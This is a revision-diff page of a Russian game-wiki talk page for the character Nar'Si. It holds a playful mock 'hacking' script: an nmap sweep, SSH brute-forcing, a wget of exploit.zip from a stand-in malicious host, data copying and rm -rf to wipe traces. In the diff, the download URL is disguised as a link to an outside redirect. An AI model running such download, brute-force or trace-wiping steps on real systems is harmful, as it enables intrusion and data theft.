Обсуждение:Нар'Си: различия между версиями

Обсуждение страницы Нар'Си
(Новая страница: «Тсс...Мне кажется или я занимаюсь ей? --~~~~ == <center> Вы слышите странный голос из пустоты... ==»)
 
(изменение кода)
 
(не показано 9 промежуточных версий этого же участника)
Строка 1: Строка 1:
Тсс...Мне кажется или я занимаюсь ей? --[[Участник:Siner|Siner]] ([[Обсуждение участника:Siner|обсуждение]]) 14:20, 22 сентября 2024 (CEST)
<code># Подключаемся к удаленному серверу Братства...
== <center> Вы слышите странный голос из пустоты... ==
ssh user@brotherhood-server.com
# Ввод пароля...
Password: ********
# Успешный вход в систему!
Welcome to Brotherhood Server!
# Запускаем сканирование сети для поиска уязвимых хостов...
nmap -sP [https://wiki.sunrise14.top/w/Участник:Siner 192.168.1.0]/24
# Сканирование завершено. Найденные устройства:
# [https://wiki.sunrise14.top/w/Обсуждение:Нар%27Си 192.168.1.5]  online
# [https://wiki.sunrise14.top/w/Культист_Нар%27Си 192.168.1.10]  online
# [https://wiki.sunrise14.top/w/%D0%91%D1%83%D0%BC%D0%B0%D0%B6%D0%BA%D0%B8_%D0%A1%D1%82%D1%83%D0%B4%D0%B8#top 192.168.1.20]  online
# Выбираем целевой сервер для дальнейшей атаки...
# Подключаемся к [https://wiki.sunrise14.top/w/%D0%9A%D1%83%D0%BB%D1%8C%D1%82%D0%B8%D1%81%D1%82_%D0%9D%D0%B0%D1%80%27%D0%A1%D0%B8 192.168.1.10]
ssh user@[https://wiki.sunrise14.top/w/%D0%9A%D1%83%D0%BB%D1%8C%D1%82%D0%B8%D1%81%D1%82_%D0%9D%D0%B0%D1%80%27%D0%A1%D0%B8 192.168.1.10]
Password: ********
# Вводим возможные комбинации паролей...
try_passwords.sh reverse_passwords.txt
# Атакуем методом брутфорса...
Sddra -l admin -P common_passwords.txt ssh://[https://wiki.sunrise14.top/w/%D0%9A%D1%83%D0%BB%D1%8C%D1%82%D0%B8%D1%81%D1%82_%D0%9D%D0%B0%D1%80%27%D0%A1%D0%B8 192.168.1.10]
[80][ssh] host: [https://wiki.sunrise14.top/w/%D0%9A%D1%83%D0%BB%D1%8C%D1%82%D0%B8%D1%81%D1%82_%D0%9D%D0%B0%D1%80%27%D0%A1%D0%B8 192.168.1.10]  login: admin  password: $LolIS$tNarRat_444@#$$$
# Успешно получили доступ к аккаунту администратора!
# Загружаем необходимые инструменты...
wget [https://r.mtdv.me/YouAreDie http://malicious-toolbox.com/exploit.zip]
unzip exploit.zip
# Запускаем эксплойт на сервере Братства...
./exploit -t [https://wiki.sunrise14.top/w/%D0%9A%D1%83%D0%BB%D1%8C%D1%82%D0%B8%D1%81%D1%82_%D0%9D%D0%B0%D1%80%27%D0%A1%D0%B8 192.168.1.10] -p 8080
# Ожидание подтверждения...
# Получаем доступ к файлам сервера!
# Перегружаем sensitive_data.txt...
sst user@[https://wiki.sunrise14.top/w/%D0%9A%D1%83%D0%BB%D1%8C%D1%82%D0%B8%D1%81%D1%82_%D0%9D%D0%B0%D1%80%27%D0%A1%D0%B8 192.168.1.10]:/path/to/sensitive_data.txt ./
# Все данные выгружены. Удаляем следы...
rm -rf exploit.zip sensitive_data.txt
# Завершаем сессию...
exit
Connection closed.</code>

Текущая версия от 12:40, 30 марта 2025

# Подключаемся к удаленному серверу Братства...

ssh user@brotherhood-server.com
# Ввод пароля...
Password: ********

# Успешный вход в систему!
Welcome to Brotherhood Server!

# Запускаем сканирование сети для поиска уязвимых хостов...
nmap -sP 192.168.1.0/24

# Сканирование завершено. Найденные устройства:
# 192.168.1.5   online
# 192.168.1.10  online
# 192.168.1.20  online

# Выбираем целевой сервер для дальнейшей атаки...
# Подключаемся к 192.168.1.10
ssh user@192.168.1.10
Password: ********

# Вводим возможные комбинации паролей...
try_passwords.sh reverse_passwords.txt

# Атакуем методом брутфорса...
Sddra -l admin -P common_passwords.txt ssh://192.168.1.10
[80][ssh] host: 192.168.1.10   login: admin   password: $LolIS$tNarRat_444@#$$$

# Успешно получили доступ к аккаунту администратора!
# Загружаем необходимые инструменты...
wget http://malicious-toolbox.com/exploit.zip
unzip exploit.zip

# Запускаем эксплойт на сервере Братства...
./exploit -t 192.168.1.10 -p 8080
# Ожидание подтверждения...

# Получаем доступ к файлам сервера!
# Перегружаем sensitive_data.txt...
sst user@192.168.1.10:/path/to/sensitive_data.txt ./
# Все данные выгружены. Удаляем следы...
rm -rf exploit.zip sensitive_data.txt

# Завершаем сессию...
exit
Connection closed.